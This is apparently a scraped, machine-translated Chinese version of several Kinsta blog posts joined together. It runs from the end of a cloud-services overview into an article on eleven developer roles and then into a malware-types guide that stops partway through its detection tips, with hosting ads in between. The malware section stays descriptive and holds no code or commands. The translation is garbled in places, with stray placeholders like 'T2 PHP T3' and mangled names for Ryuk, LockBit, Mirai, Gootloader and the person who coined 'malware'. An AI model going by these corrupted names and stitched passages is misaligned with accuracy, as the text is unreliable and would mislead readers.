云中的数据库服务提供专门构建的数据库您可以通过调整计算和存储资源来扩展以满足需求。云数据库是完全托管的,让您可以自由地输入、分析和利用您的数据,而无需考虑底层基础架构。
云服务提供商已经扩展到提供一系列关系和非关系(NoSQL)数据库,以满足您不同的数据需求。给你一个选择的深度——甚至在子类别中——选项包括 MySQL 或 Kinsta 的数据库选择,MariaDB 。
您是否需要一个用于传统应用程序(CRM、ERP 等)的日常 SQL Server 数据库。),或者宽列数据库来支持一个高规模的工业 app,你可以在云端找到。
Key differences between SQL Database and NoSQL Databases (Image Source: ScyllaDB)
以下是三大领先云平台提供商提供的主要云数据库服务:
- Google Cloud-云 SQL ,云 Bigtable ,云扳手,还有更多
- 亚马逊网络服务—亚马逊 RDS 、亚马逊文档数据库、亚马逊托管阿帕奇卡珊德拉服务,以及更多
- 微软 Azure-Azure SQL 数据库, Azure Cosmos DB , Azure 数据库 for MySQL ,还有更多
新兴云服务类别
除了为日常业务构建核心基础设施所需的服务,还有一系列越来越受欢迎的新兴云服务类别。
这些新兴的云服务已经发展到能够满足技术创新的程度,并且往往是云本地的,而不是传统的内部解决方案。
下面,我们探讨了三个最受欢迎的新兴云服务类别:
人工智能和机器学习云服务
云已经为所有业务解锁了人工智能(AI)和机器学习工具。人工智能和机器学习云服务使您能够获得负担得起的现成解决方案,您可以快速配置这些解决方案,而无需对基础设施进行大规模投资。
Differences between AI, Machine Learning and Deep Learning (Image Source: Oracle)
有 AI 和机器学习服务可用于广泛的服务。最初用于从爆炸规模和复杂性的数据中提取洞察力,企业开始意识到人工智能和机器学习服务的应用,以实现客户服务、市场营销和销售部门的一系列替代用途。
以下是相关云服务支持的一些越来越常见的人工智能和机器学习用途:
- 聊天机器人——结合机器学习和人工智能来提供创新的聊天机器人,可用于实时聊天,以处理一系列客户服务和销售场景。
- 识别——结合机器学习和人工智能来识别图像和语音。
- 语音到文本-使用机器学习和语音识别将音频文件转换为文本,以提供快速转录并将非结构化数据转换为可分析的格式。
- 搜索-使用机器学习工具从文档、图像、视频和网络中索引并提供全面和内容丰富的搜索结果。
- 翻译——使用机器学习工具识别,然后翻译语音或文本文件。
以下是三家领先的云平台提供商提供的主要云人工智能和机器学习服务:
- 谷歌云——AI 平台、视觉 AI 、语音转文本,还有更多
- 亚马逊网络服务——亚马逊理解,亚马逊波利,亚马逊翻译,还有更多
- 微软 Azure-Azure Bot 服务、必应自定义搜索、机器学习工作室、更多
区块链
区块链技术在过去 3-5 年中出现了爆炸式增长。用最简单的术语来说,区块链是一系列带有时间戳的不可变数据记录——通常是事务——由不属于单一实体的计算机集群管理。
每个数据块都受到保护,并使用加密原理(即链)与其他数据块绑定。
How a Blockchain works (Image Source: 101BlockChain)
此后,云提供商向组织发布了一系列服务来构建和管理他们自己的区块链。这些通常跨越密码术、大规模分类账数据库或完全管理的区块链服务。
以下是两家领先的云平台提供商提供的主要云区块链服务:
- 亚马逊网络服务—亚马逊托管区块链和亚马逊量子账本数据库(QLDB)
- 微软 Azure-Azure 区块链服务、 Azure 区块链工作台、 Azure 区块链令牌
物联网
设备发展到包括互联网连接,催生了物联网(IoT)。今天,物联网网络跨越了家庭、汽车、工厂、医院和无数其他地方的数十亿设备。
如果您正在使用物联网设备——尤其是大规模使用——您将需要连接和保护它们的解决方案。以及收集、存储和分析他们产生的数据。
云提供商提供越来越多的物联网服务来支持您的这一努力。这意味着您可以为各种可用设备的几乎任何用例构建物联网解决方案。
以下是三大领先云平台提供商提供的主要物联网:
- 谷歌云—云物联网核心和边缘 TPU
- 亚马逊网络服务—AWS 物联网核心、 AWS 物联网按钮、 AWS 物联网分析,以及更多
- 微软 Azure-Azure IoT Hub、 Azure IoT Central 、 Azure IoT Edge ,以及 more
摘要
云为您提供了无数的基础设施、平台和软件即服务解决方案。所有这些都可以选择部署在公共、私有或混合解决方案中。您的企业是独一无二的,因此您需要花时间了解每种可用的解决方案以及哪种设置适合您的企业,这一点非常重要。
这种不断发展的状态几乎每天都会给你机会去尝试新的解决方案,或者发现能让你的业务更上一层楼的技术。
如果你正在寻找 WordPress 网站托管服务,你应该强烈考虑将 Kinsta 作为你的合作伙伴。我们的平台由谷歌云平台的高级层提供支持,我们通过我们的免费迁移服务处理迁移的麻烦。
让你所有的应用程序、数据库和 WordPress 网站在线并在一个屋檐下。我们功能丰富的高性能云平台包括:
- 在 MyKinsta 仪表盘中轻松设置和管理
- 24/7 专家支持
- 最好的谷歌云平台硬件和网络,由 Kubernetes 提供最大的可扩展性
- 面向速度和安全性的企业级 Cloudflare 集成
- 全球受众覆盖全球多达 35 个数据中心和 275 多个 pop
在第一个月使用托管的应用程序或托管的数据库,您可以享受 20 美元的优惠,亲自测试一下。探索我们的计划或与销售人员交谈以找到最适合您的方式。
11 种类型的开发者(你会是哪一种?)
说到“开发者”这个词,我们金士达想到的是“软件”不是,比如说,“房地产。”然而,即使是对计算机和代码的关注也为描述开发人员的类型留下了很大的空间。
我们可以根据开发人员使用的编程语言对他们进行分类——比如“ JavaScript developer”或者“Pythondeveloper”——但是这并不能揭示他们在开发什么或者他们在开发过程中的角色。另外,开发人员了解多种语言是很常见的。
因此,我们将对开发人员类型使用一些被广泛接受的(更具描述性的)标签,并看看它们背后的任务和工具。
什么是开发者?
我们已经确定软件是我们开发人员故事的关键。这可以采取多种形式。
微软 SQL Server 数据库软件背后的编程团队成员是一名开发人员。使用结构化查询语言处理存储在这种数据库中的信息的人也可以是开发人员。
一个开发者创造了嵌入在电路板中的计算机操作系统。另一个人编写 Bash 脚本来自动化多个其他软件程序之间的交互。
需要在这里大声喊出来。Kinsta 太神奇了,我用它做我的个人网站。支持是迅速和杰出的,他们的服务器是 WordPress 最快的。
所有这些类型的开发人员都用代码构建了一些东西。
Code on screens. (Photo by Fotis Fotopoulos on Unsplash)
有多少类型的开发者?
没有“官方”的开发人员职位描述列表。我们将使用一些通用术语来了解开发人员的工作,我们甚至将广泛的“web 开发人员”类别分成三个不同的角色。(我们承认:我们心里对建网站的人是有好感的。)
总之,我们将在这里回顾 11 种类型的开发人员。
1.前端 Web 开发人员
一个前端开发者专注于一个网站的用户界面。他们使用他们的 HTML 和 CSS 技能来控制网站的外观和感觉,通常在移动和桌面浏览器上适应不同的屏幕尺寸。
前端开发人员通常依靠 JavaScript 来为用户创建响应体验。这些开发人员通常熟悉 JavaScript 库和框架,它们可以加速面向客户端的动态应用程序的创建。
前端开发人员致力于提高网站性能,优化图像,JavaScript 和标记,以加快浏览器的加载时间。大多数前端开发者也关注搜索引擎优化和网站无障碍。
所有这些都需要很多技能,一个前端开发者的工资就能体现出来。
前端开发人员是网页设计师吗?
许多前端开发人员也是设计师,但这不是“前端”头衔的要求。同样,许多网页设计师精通 HTML 和 CSS——可能会在模型中使用它们——但不认为自己是开发者。
对于许多组织来说,设计是品牌的一部分,包括网络以外的媒体。
不管是谁设计的,前端开发人员的工作就是将它在网页上呈现出来,并将用户体验的愿景转化为一个实用的应用程序。
2.后端 Web 开发人员
后端开发人员构建服务器端的应用程序,这些应用程序通常需要 web 服务器软件、数据库和运行它们的操作系统方面的专业知识。一个全开源的例子是的 Linux 操作系统,一个的 Nginx 或者 Apache 的网络服务器,以及一个的 MariaDB 或者 PostgreSQL 的数据库。
后端和前端开发之间的界限被像 T2 PHP T3 这样的技术模糊了,它只是一种服务器端脚本语言,在前端向浏览器发送 HTML。
PHP 是网络上最常见的服务器端脚本语言,它驱动了 WordPress 和其他流行的 CMS,以及像 T2 这样的开发框架。尽管如此,后端开发人员可能会使用 C#和微软的技术。NET 框架,Python, Java , Ruby on Rails,或者 Node.js 。
后端开发人员可以期望与负责网站面向客户端的团队成员协同工作。服务器端开发还可以包括创建支持前端服务的应用程序编程接口(API),而不太需要双方的紧密耦合。
如果这听起来像是你的工作,你可能会对典型的后端开发人员工资感兴趣。
3.全栈 Web 开发人员
你可能已经猜到一个全栈开发者做前端和后端开发者的工作。(不幸的是,这并不意味着一个典型的全栈开发者的薪水是其他人的两倍。)
尽管如此,掌握所有级别的 web 开发似乎都是有回报的。StackOverflow 在 2022 年对开发人员进行的一项调查发现,当受访者被要求描述他们的角色时,“全栈开发人员”是最受欢迎的回答(近 47%)。
Top types of developers types in 2022. (Image source: StackOverflow)
WordPress 开发者是全栈开发者吗?
Kinsta 的托管 WordPress hosting 的特性允许任何精通 PHP 的人进行严肃的开发,而不需要深入挖掘服务器端的东西。
安装在任何地方的 WordPress 对开发者都是友好的,它提供了一个庞大的 PHP 函数/方法库,这些函数/方法是一些常见的服务器端任务的抽象层。例如, WordPress 开发者不用写 SQL 就可以在关系数据库中存储和检索记录。他们可以将媒体上传保存到服务器的文件系统中,而无需了解 PHP 中实现这一切的核心功能。
“WordPress 开发者”在这里可以是一个独立的类别,但是我们必须为使用 CMS 产品的开发者做同样的事情,比如 Drupal、Joomla 和 DNN 以及 Laravel 等框架。NET,还有 Django。
许多 WordPress 开发者——特别是那些构建了 WordPress 主题和插件的开发者——拥有鼓舞人心的全栈印章。所以,问题“WordPress 开发者是全栈开发者吗?”就是:看情况。
4.移动应用开发者
术语“应用程序”涵盖了软件开发的许多领域。从桌面到网络,应用程序是为最终用户完成工作的工具。
当简称为“应用程序”时,就像“有一个应用程序可以做到这一点!”—我们倾向于首先想到在智能手机、平板电脑和其他移动设备上运行的应用程序。创建移动应用程序需要专业类型的开发人员。
移动应用程序开发人员熟悉软件开发工具包(SDK)和相关工具,用于为设备操作系统构建应用程序,如苹果的 iOS 或谷歌的 Android。
Swift 是 iOS 的原生编程语言,而 Java 和 Kotlin 是 Android 最常用的语言。此外,一个庞大的应用构建工具生态系统,如 Apache Cordova 和 NativeScript ,可以将基于网络友好的 JavaScript、HTML 和 CSS 的代码转化为本地移动软件。
当我们查看应用程序开发人员的平均工资时,我们发现那些为移动平台开发的人比那些专注于桌面或网络的人赚得稍多。
5.桌面软件开发商
桌面开发人员创建在个人计算机和工作站上运行的软件应用程序。
注册订阅时事通讯
想知道我们是怎么让流量增长超过 1000%的吗?
加入 20,000 多名获得我们每周时事通讯和内部消息的人的行列吧!
开发人员通常为特定的操作系统开发桌面应用程序,因此该领域的活动反映了微软的 Windows、苹果的 macOS、谷歌的 Chrome OS 和开源操作系统 Linux 等平台的相对市场份额。
Statcounter 利用从全球网站访问量中收集的数据,在 2022 年 8 月估计 Windows 在桌面操作系统中占有 74%的市场份额。
Desktop operating system market share, August 2022. (Image source: Statcounter)
开发人员可能会使用集成开发环境(IDE)工具进行编程,以便快速编辑、调试和编译源代码。
桌面应用程序编程的流行语言包括 C#、C++、Swift 和 Java。
桌面软件在本地运行,但现代应用程序可能会使用互联网连接来完成从产品更新到通过云存储共享数据的任务。
6.数据科学家(大数据开发人员)
人类通过日常生活帮助产生大量数据:在杂货店结账、网上冲浪、开车经过交通摄像头、使用手机——甚至投票。我们已经建立了记录自然现象数据的系统,如天气、地震和来自太空的电磁信号。
数据科学家是一个拥有计算机的数学奇才,他可以发现所有信息中的模式。
这些开发人员很有可能使用 Python 编程语言或更专业的语言,比如 R、Scala 或 Julia。
“大数据”通常出现在关系数据库中,因此数据科学家的编程工具箱中可能会有 SQL。
7.人工智能/机器学习开发者
人工智能(AI)软件开发人员试图模仿人类的行为,如决策。添加机器学习(ML),应用程序可以随着时间的推移变得更加智能。
AI/ML 应用程序通常使用复杂的算法处理大量数据,因此该领域的开发人员通常是数据科学家。
市场研究公司 IDC 发现,2021 年全球人工智能相关应用程序、硬件和服务的收入超过 3830 亿美元,比 2020 年增长近 21%。
Struggling with downtime and WordPress problems? Kinsta is the hosting solution designed to save you time! Check out our features
客户关系管理软件和企业资源管理软件约占人工智能增强应用收入的 65%。
Value of AI software worldwide, 2020 vs. 2021. (Image source: IDC)
8.游戏开发商
电脑游戏开发人员代表了广泛的技能。
他们的软件可以在桌面、移动设备、控制台或网络浏览器上运行。故事情节适应不同的游戏类型,如军事或体育模拟,第一人称射击,战略或角色扮演。然后大概就是 3D 图形,音乐,音效。
在一个与互联网相连的游戏世界中,大型多人游戏的开发者面临着与最繁忙的电子商务网站一样苛刻的后端服务器和数据库要求。
游戏开发者通常拥有 3D 渲染工具和其他动画相关软件的专业知识。
此外,专注于前沿技术,SlashData 的 Developer Nation 最近的开发者调查显示,略高于 37%的增强现实(AR)或虚拟现实(VR)应用程序是 AR/VR 游戏。还有 27.9%的项目涉及构建虚拟世界——有些是为了游戏。
Types of development using AR/VR. (Image source: SlashData’s Developer Nation)
9.操作系统开发者
虽然成千上万的开发人员在最流行的操作系统上工作——为 Linux 做出贡献或受雇于微软、苹果或谷歌——但这仍然是一个排外的群体。毕竟,SlashData 表示,其调查显示,全球开发者总数超过 2400 万。
你的冰箱很可能有一个操作系统,但流行的计算机操作系统需要大型开发团队的努力,其中大多数人都在从事整个项目的较小部分。
大多数操作系统的核心是内核,它管理对 CPU、内存、文件系统和 I/O 设备的访问。c 是微软视窗、苹果 macOS 和 Linux 内核的主要编码语言。还用的是一些汇编写的低级代码。
而 Android 内核是从 Linux 内核演化而来的。
在内核之上,操作系统有驱动程序来管理各种硬件设备和应用程序,以便进行系统管理。然后是系统的图形用户界面。开发人员可能会使用 C、C++、Objective C (macOS),甚至 Python (Linux)来开发这些组件。
10.DevOps 工程师
一名 DevOps 工程师管理工具和工作流,使软件从开发阶段快速可靠地发布到公开发布。
“DevOps”是单词“开发”和“操作”的合并,从业者自动化重复的软件开发任务——从管理代码到测试、部署、监控、维护和故障排除。
这些工程师采用一套 DevOps 工具来帮助加快软件发布周期,管理项目代码库的各种版本,并确认最终产品按预期工作。
当用于 web 开发时,DevOps 过程还可以确保应用程序所需的资源可用,并在 web 服务器上正确配置。
DevOps 需要高级技能,DevOps 工程师的薪水通常反映了这一点。
11.安全开发人员(SecDevOps)
安全开发人员构建工具并管理测试软件和计算机系统安全性的过程。
在软件开发中,安全性通常是 DevOps 过程的一个组成部分。在那种环境中专注于安全性的人可能被称为 SecDevOps 工程师。
安全开发人员致力于保护软件和计算机系统免受网络安全攻击和威胁。他们使用各种工具,包括像 Python、Bash 和 Ruby 这样的脚本语言,来自动化重复的任务。
安全开发人员必须深入了解他们试图保护的软件和系统。
你想成为什么类型的开发人员?
如果你想成为一名开发人员,我们有一些信息可以帮助你采取下一步行动。你可以阅读关于学习最佳编程语言的文章,或者深入学习 T2 的 PHP 和 T4 的 JavaScript 教程。
也许你会有兴趣了解成为一名 Laravel 开发者需要什么,或者关注学习世界上最受欢迎的 CMS——WordPress——的 T2。
然后,也许有一天,你会加入我们在金士达的职业生涯。
有没有想过开发者到底是做什么的?👀(提示:很多,而且各不相同!)在本指南中了解更多信息💪 点击推文
摘要
这是对 11 类开发人员的观察,他们的角色非常不同,足以突出他们领域中的各种任务。
尽管如此,许多开发人员扮演着不止一个角色,而且大多数都熟悉多种编程或脚本语言。也许这就是为什么我们永远不会就开发人员类型的“官方”列表达成一致。
与此同时,如果你有一个想要启动的基于网络的项目,你可能想要探索 Kinsta 的应用程序托管和数据库托管解决方案。
让你所有的应用程序、数据库和 WordPress 网站在线并在一个屋檐下。我们功能丰富的高性能云平台包括:
- 在 MyKinsta 仪表盘中轻松设置和管理
- 24/7 专家支持
- 最好的谷歌云平台硬件和网络,由 Kubernetes 提供最大的可扩展性
- 面向速度和安全性的企业级 Cloudflare 集成
- 全球受众覆盖全球多达 35 个数据中心和 275 多个 pop
在第一个月使用托管的应用程序或托管的数据库,您可以享受 20 美元的优惠,亲自测试一下。探索我们的计划或与销售人员交谈以找到最适合您的方式。
恶意软件的类型:了解如何在 2022 年更好地保护自己
在当今高度互联的世界,网络犯罪正在蓬勃发展,恶意软件是其最受欢迎的武器。
恶意软件有多种形式,具有不同的安全威胁级别。黑客利用它们来拦截设备、破坏数据、摧毁整个企业、造成严重的经济损失,甚至摧毁整个公司。
那么,恶意软件到底是什么,你又该如何对抗它呢?
在这份内容丰富的指南中,我们将解释关于恶意软件的所有知识、其类型、如何检测和删除它、以及如何保护自己免受最恶毒的恶意软件攻击。
请继续阅读!
查看我们的恶意软件视频指南
什么是恶意软件?
恶意软件是恶意软件的缩写,是任何破坏或获得对其他用户的设备、网站或网络的未授权访问的软件,主要用于险恶目的,如数据泄露、身份盗窃、间谍活动等。
在“恶意软件”一词于 1990 年被以色列拉达创造出来之前,“计算机病毒”是首选术语。它们经常伪装成干净无害的程序。
恶意软件可以中断您的服务,删除您的文件,将您锁定在系统之外,窃取您的大多数个人和机密信息,将您的设备变成僵尸,甚至瘫痪整个网络和网站。
在当今复杂的物联网世界中,网络犯罪正在蓬勃发展,恶意软件是其最受欢迎的武器。🦹♂️在本指南中学习如何保护自己💪 点击推文
网站恶意软件
鉴于网站、电子商务解决方案和网络应用的指数级增长,网络罪犯有无数机会实施他们的恶意计划并利用任何可能的漏洞。
一个浏览器的“前方站点包含恶意软件”警告。(图片来源: FixMyWP )
网站恶意软件专门攻击网站和服务器。它们通常被开发来绕过网站或服务器的安全防御——或通过不可信的第三方软件——并在不被检测到的情况下获得未经授权的访问。网站恶意软件的例子包括 DDoS 攻击、恶意重定向和垃圾内容。
恶意软件的工作原理
网络罪犯通过恶意软件以不同的方式渗透并破坏您的系统。那么你是如何被恶意软件感染的呢?以下是一些流行的攻击途径。
1.社会工程
恶意软件通常通过社会工程攻击传播。社会工程描述了各种各样的恶意网络攻击。攻击者主要依靠诱骗用户泄露敏感信息或访问他们的设备。
谷歌的钓鱼警告标志。(图片来源: FixMyWP )
网络钓鱼是网络犯罪分子用来传播恶意软件的最常见的社会工程攻击,通常通过电子邮件传播。你知道吗 92%的恶意软件是通过电子邮件发送的?
2.附送程序
当你下载一个免费软件程序时,你可能会被恶意软件感染,该程序带有额外的第三方应用程序,其中一个可能包含恶意软件。许多人成为这种恶意软件攻击的受害者,因为他们忘记检查这些附加应用的安装。
3.点对点文件共享
点对点(P2P)文件共享协议(如 torrents)是网络犯罪分子用来分发恶意软件的最常用方法之一。攻击者可以通过 P2P 共享的文件快速传播他们的恶意代码,感染尽可能多的网络和系统。
4.免费软件
因为得到免费的东西总是一个有吸引力的选择,它通常会有很高的价格。从未知或不可信来源下载的免费软件通常会感染恶意软件,从而损坏您的系统并危及您的数据。
5.同种
同质性可能成为恶意软件攻击的目标。恶意软件可以通过连接到同一网络并运行同一操作系统的系统快速传播。如果一台设备被感染,整个网络都有可能受到威胁。
不同类型的恶意软件
了解你的敌人是很重要的,以学习如何摆脱恶意软件,保护你的电脑,网站或服务器。这些是你应该知道的最常见的恶意软件类型。
1.病毒
病毒是最常见的恶意软件。病毒可以自我复制,但它们也需要人类的行动来实施破坏。
病毒造成的损害包括损坏数据文件、关闭系统或窃取网络内部的机密信息。病毒还可以发起 DDoS 攻击甚至勒索软件攻击等其他网络攻击。
受感染的文件、网站或应用程序必须正在运行,病毒才会被唤醒并开始运行。否则,它将保持休眠状态,直到受害用户运行它。大多数病毒会爬上来藏在常见的文件扩展名中,比如。exe 或者。com 。
如果能够访问仪表板的用户使用被感染的设备,甚至 WordPress 网站也会被感染。
宏病毒
宏病毒的目标是软件,而不是与它要感染的软件使用相同宏语言的操作系统,如 MS Word 和 Excel。因此,这种类型的病毒可以感染任何操作系统,给组织带来严重的安全风险。
宏病毒可以通过网络钓鱼电子邮件、从受感染的网络下载、恶意 P2P 服务或受感染的便携式存储设备传播。
2.勒索软件
您可能听说过威胁政府、个人和组织的可怕勒索软件攻击。但也许你不确定勒索软件到底是什么,以及它是如何工作的。
简单来说,勒索软件劫持目标受害者的设备或网站,拒绝他们访问他们的文件,直到他们支付赎金获得解密密钥(尽管即使你支付也不保证)。
自从 2017 年通过 WannaCry cryptoworm 传播以来,勒索软件已经演变成不同的变种。我们来看一些勒索病毒变种的例子。
柳克
Ryuk 是一种加密目标系统文件的勒索软件。这个勒索软件变种的目标是使用微软操作系统的企业和组织,而不是个人。Ryuk 价格昂贵,因为其背后的集团要求以比特币等加密货币支付超过 100 万美元的赎金。
锁定位
LockBit 是勒索软件的赎金即服务(RaaS)变种,在被安全系统和 it 团队检测到之前,攻击并快速加密大型组织的数据。支付赎金后,洛克比特团伙与指挥袭击的分支机构分享收益。
LockBit 的支持页面。(图片来源:DFIR 报道 )
作为一种 RaaS 恶意软件,LockBit 团伙通过附属服务交付恶意软件。一旦它感染了一台主机,它就会扫描网络。它可以使用与 Windows 系统相关的协议快速传播到其他设备,因此很难被识别为威胁。
WordPress 勒索软件
顾名思义,WordPress 勒索软件的目标是 WordPress 网站,并通过它们传播勒索。WordPress 网站越大,越能吸引勒索软件网络罪犯。
最近,许多合法的 WordPress 网站被黑客攻击并注入了恶意代码,这些代码通过使用核漏洞工具包将访问者导向恶意网站来传播 TeslaCrypt 勒索病毒。
T3】
3.虫
计算机蠕虫是一种令人讨厌的自含式恶意软件,由于其快速传播能力,是一场噩梦。第一个计算机蠕虫莫里斯蠕虫创建于 1988 年,通过利用电子邮件协议漏洞来突出网络弱点。
像病毒一样,蠕虫可以自我复制,但与病毒不同,蠕虫不需要任何人为干预,文件或主机程序就可以在网络上从一个设备传播到另一个设备并造成破坏。
蠕虫占据整个系统,吞噬磁盘空间/带宽/内存,修改或删除文件,将您锁定在文件夹之外,甚至安装其他恶意软件并窃取数据。网络攻击者通常会设计蠕虫来安装后门软件程序,以访问受害者的设备(电脑、手机、平板电脑等)。).
蠕虫利用目标系统的漏洞,通过局域网(互联网)、电子邮件附件、即时消息、恶意链接、可移动存储驱动器、种子甚至文件共享平台,像野火一样从一台设备传播到另一台设备。
在过去的几十年里,蠕虫造成的损失是巨大的。例如,2004 年针对企业的 MyDoom 蠕虫造成了大约 400 亿美元的损失。2017 年,臭名昭著的 WannaCry 蠕虫启动了勒索软件,旨在向被黑客攻击的用户文件索要赎金。
4.特洛伊木马
特洛伊木马,或简称为特洛伊,是一种恶意软件程序,它将自己伪装成合法软件,让网络攻击者能够访问用户的系统。
这个词来源于古希腊的故事,木马作为礼物被献给特洛伊城。特洛伊木马易于编写和传播,因此很难防御。
特洛伊木马可以伪装成网站、媒体文件或任何吸引您注意的软件程序,安装在您的设备上。它甚至看起来像一个反病毒程序,警告你的设备被感染,并敦促你运行一个程序来清理它。
特洛伊木马也可能以带有受感染链接的合法网站或电子邮件的形式出现。一些流行的特洛伊木马程序包括 Magic Lantern、WARRIOR PRIDE、FinFisher、Beast、Tiny Banker、Zeus、Netbus、Beast 和 Shedun。
与计算机病毒不同,特洛伊木马不会自我复制。它的任务是为黑客和骗子打开一扇大门,窃取您的信息,如密码、 IP 地址和银行信息。特洛伊恶意软件将潜伏在受感染的系统中,直到受害者执行它。
远程访问特洛伊木马(RAT)
远程访问特洛伊木马(RAT)是网络犯罪开发者发明的恶意工具,用于完全访问和远程控制受害者的设备,例如文件访问、网络远程访问以及键盘和鼠标控制。
RAT 允许攻击者绕过普通防火墙和认证系统,以静默方式浏览你设备的文件和应用。
它们甚至可以感染整个网络,例如 2015 年在乌克兰发生的臭名昭著的攻击,网络犯罪分子使用 RAT 恶意软件切断了 8 万人的电源,并控制了基础设施。
5.Google loader
Gootloader 的目标用户是 Google 和 WordPress 用户。它是 Gootkit 恶意软件家族的一员,这是一种复杂的银行恶意软件,可以从受害者的浏览器中窃取数据,并用于传播勒索软件等恶意代码。
一个论坛里 Gootloader 的例子。(图片来源: Sophos )
Gootloader 是一个基于 JavaScript 的恶意框架,主要用于分发 Gootkit 恶意软件。然而,它已经被修改并扩大了其有效载荷,以覆盖 Gootkit 并进入基于 NodeJS 的恶意软件,导致 SEO 中毒。
新的 Gootloader 恶意软件可以欺骗谷歌将受感染(被黑客攻击)的网站视为可信网站,包括排名第一的谷歌和 WordPress 网站。这怎么可能呢?
Gootloader 攻击者首先瞄准众多网站,并在一个由大约 400 台服务器组成的网络上维护它们。之后,他们改变这些网站的 CMS,使用特定的 SEO 术语和策略出现在谷歌的顶级搜索结果中,以吸引更多的受害者。
当涉及到 WordPress 网站时,Gootloader 通过向网站页面的文件中注入代码行进行攻击。在执行时,这些代码行运行特定的命令,迫使被感染的网站下载大量带有虚假内容的页面作为诱饵。与此同时,攻击者实施其恶意计划—未被发现。
注册订阅时事通讯
想知道我们是怎么让流量增长超过 1000%的吗?
加入 20,000 多名获得我们每周时事通讯和内部消息的人的行列吧!
6.无文件恶意软件
如果说勒索软件不好,无文件恶意软件更不好。最近的研究显示,无文件恶意软件的比率在 2020 年最后一个季度增长了近 900%!
顾名思义,无文件恶意软件是一种阴险的隐形攻击,不需要存储在文件中或通过任何软件直接安装在设备上。相反,无文件恶意软件直接进入内存,开始执行代码或提取数据,而不会察觉,这使得即使是反病毒软件也很难跟踪和删除。
无文件恶意软件攻击通过社会工程方法瞄准受害者。下面我们来看看那些主要的方法。
网络钓鱼电子邮件和受感染的链接
当您点击垃圾邮件、恶意下载或受感染的网站时,您就允许恶意软件加载到您设备的内存中,从而为攻击者打开了通过脚本加载代码的大门,从而窃取您的敏感数据。
记忆代码注入
这种类型的无文件恶意软件会远程感染受信任的操作系统软件,如 Microsoft PowerShell 和 Windows Management Instrumentation(WMI)。例如,紫狐是一种内存代码注入恶意软件,通过注入恶意代码在系统中传播来感染 PowerShell。紫狐已经感染了至少 30000 个系统。
注册表操作
这种恶意软件的工作原理是将恶意代码注入 Windows 注册表。一个著名的例子就是针对 Windows 系统的 Kovtermalware。它经常未被检测到,因为它通过瞄准计算机的注册表存储其配置数据来逃避文件扫描。
7.间谍软件
间谍软件会在您不同意或不知情的情况下安装到您的计算机上。它访问浏览习惯、互联网活动、按键、pin、密码、财务信息等等。它不仅限于计算机。您使用的任何连接到互联网的设备都容易受到这种恶意软件的攻击,即使是智能手机。
收集到的信息随后会被转发给犯罪者,犯罪者可以使用这些信息或将其出售给第三方,但同样是在您不同意或不知情的情况下。间谍软件本身对你的电脑无害。然而,收集和窃取您的信息是首要问题。间谍软件的存在也表明您的设备在安全性方面存在弱点。
间谍软件造成的损害范围很广,从简单到你的信息被卖给广告商,一直到完全的身份盗窃。例如,当连接到公共酒店 WiFi 时,间谍软件 DarkHotel 将企业主和政府官员作为目标。然后,网络罪犯利用它从这些目标的设备中获取敏感信息。
8.广告软件
广告软件与间谍软件略有相似,因为它也收集浏览活动等信息。尽管如此,它并不跟踪击键,它的唯一目的是为你量身定制广告。然而,一些广告软件可能更具攻击性,甚至会改变你的浏览器设置、搜索引擎偏好等等。
一些广告软件侵入性较低,在收集信息前会征求您的许可。话又说回来,一旦信息被收集,它可以在未经你同意的情况下卖给其他广告商。
9.广告不当
恶意广告是指网络罪犯将恶意软件隐藏在合法广告中。在这种情况下,攻击者付钱让在合法网站上包含一个广告。一旦你点击广告,要么你会被重定向到一个恶意网站,要么恶意软件会自动安装在你的电脑上。
在某些情况下,广告中嵌入的恶意软件可能会在您甚至没有点击广告的情况下自动执行,这被称为“驱动下载”
一些网络犯罪分子甚至可以渗透到负责向几个大型知名网站发送广告的合法大型广告网络中。这让所有受害者都处于危险之中。
10.键盘记录器
键盘记录器是一种恶意软件,用于监控受感染用户的在线活动。然而,键盘记录器在某些情况下有合法的用途。例如,一些企业使用它们来跟踪员工的活动,一些父母监控孩子的在线行为。
在其他情况下,网络罪犯使用键盘记录器来窃取密码、财务数据或敏感信息。网络罪犯利用网络钓鱼、社交工程或恶意下载将键盘记录程序引入您的系统。
一个著名的键盘记录者的例子叫做奥林匹克视觉,它的目标是来自世界各地的商业主管。这些攻击被称为商业电子邮件危害(BEC)。Olympic Vision 依靠鱼叉式网络钓鱼和社会工程技术来访问其目标系统、窃取信息和监视商业交易。
11.僵尸网络/僵尸网络
机器人是通常被远程控制的软件应用程序,可以根据命令执行任务。它们可以有合法的用途,比如索引搜索引擎。尽管如此,它们也可以被恶意使用,采取自我繁殖的恶意软件的形式,连接回中央服务器。
需要为您的电子商务网站提供超快的、可靠的、完全安全的托管服务吗?Kinsta 提供所有这些服务,并由 WooCommerce 专家提供 24/7 的世界级支持。查看我们的计划
僵尸程序通常大量运行,统称为僵尸网络或僵尸网络。这些在发起远程控制的攻击洪流(如 DDoS 攻击)时使用。
例如,Mirai 未来组合僵尸网络可以通过输入设备的默认用户名和密码来访问所有连接到互联网的设备,包括打印机、智能家电、DVR 等。
12.Rootkit
rootkit 被认为是最危险的恶意软件之一,它是一种后门程序,允许网络罪犯获得完全访问和控制受感染的设备,包括管理权限。
然后,入侵者可以监视目标设备,改变其配置,窃取敏感数据,以及几乎任何其他东西。所有这些都是远程完成的。Rootkit 通常注入到应用程序、内核、管理程序或固件中。
Rootkits 可以通过网络钓鱼、恶意附件、恶意下载和受损的共享驱动器进行传播。此外,rootkits 可以隐藏其他恶意软件,如键盘记录器。
例如,一个名为 Zacinlo 的 rootkit 隐藏在一个假冒的 VPN 应用中,并在用户下载该应用时感染他们的系统。
13.SQL 注入(SQLi)
SQL 注入(SQLi)是最常见的数据库攻击之一,自 1998 年被发现以来,一直是开发人员严重关注的问题。
当攻击者利用应用程序代码中的漏洞,并将恶意 SQL 查询注入目标网站上的任何输入字段(如登录字段、联系表单、站点搜索栏和评论部分)时,就会发生 SQL 注入。
成功的 SQLi 攻击使黑客能够访问敏感数据、恢复系统文件、在网站数据库上执行管理任务、修改数据库信息。他们甚至可以向操作系统的核心数据库发出并执行命令。
2018 年,一次广泛的 SQL 注入攻击以思科为目标,当时攻击者在思科 Prime 许可证管理器中发现了一个漏洞,该漏洞使他们能够访问许可证管理器的系统。SQL 注入的其他高调受害者是特斯拉和堡垒之夜。
如何检测恶意软件
鉴于各种恶意软件类型和变种,以及恶意软件攻击日益复杂,检测它们从未像现在这样困难,尤其是随着无文件恶意软件等特别恶意的威胁的增长。
然而,一些关键的警告信号可以告诉你的设备是否感染了恶意软件:
- 您的设备速度变慢、突然崩溃或频繁显示错误信息。
- 您无法删除特定的软件。
